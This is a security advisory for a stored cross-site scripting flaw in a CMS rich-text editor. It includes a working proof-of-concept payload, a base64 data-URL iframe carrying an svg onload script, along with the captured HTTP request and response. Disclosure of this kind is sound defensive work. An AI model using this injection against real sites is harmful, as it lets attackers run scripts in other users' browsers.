The text editor contains a Stored Cross-Site Scripting vulnerability
Issue date: 27-10-2020Affects versions: 14.2
Security Issue ID
SECURITY-169
Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2
Severity
high
Description
To exploit this vulnerability a payload was crafted with a base64 encoded string containing the
following value:
<svg/onload=alert(1)>
This payload was placed inside a data URL with content-type of “text/html’. This URL was set in the
“src” attribute of an iframe element. Note the “embed” element is also vulnerable.
The request below shows the payload highlighted:
POST /cms/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center- tabs-panel~container-cards-3-panel-editor-extension.workflow-menu-list-1-item- link&iframe&wicket-ajax=true&wicket-ajax-baseurl=%3F1%26amp%3Biframe HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------- 326343405939007604132881994108 Content-Length: 1185 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/cms/?1&iframe&path=/content/documents/developertrial/banners/ banner1 Cookie: --snip-- Upgrade-Insecure-Requests: 1 -----------------------------326343405939007604132881994108 Content-Disposition: form-data; name="id2f_hf_0" -----------------------------326343405939007604132881994108 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:1:ite m:view:1:fieldContainer:item:value:widget" Stored XSS -----------------------------326343405939007604132881994108 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:2:ite m:view:2:fieldContainer:item:panel:editor" <p><iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe></p> --snip--
The response below shows it is accepted by the server with a 200-status code:
HTTP/1.1 200 Date: Mon, 08 Jun 2020 00:23:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, no-store Content-Type: text/xml;charset=UTF-8 Connection: close Content-Length: 18885 --snip--
Authors are default not able to publish the pages to the site but with this payload are able to place client-side scripts to users of the CMS. Users with privileges to publish are able to place client-side scripts in the frontend which affects all visitors.
Instructions
Customers are recommended to upgrade to the latest maintenance or minor releases as indicated above. This can be done by simply incrementing the version number of the parent POM for the implementation project.
Credit for discovering this issue
Thomas van Ruitenbeek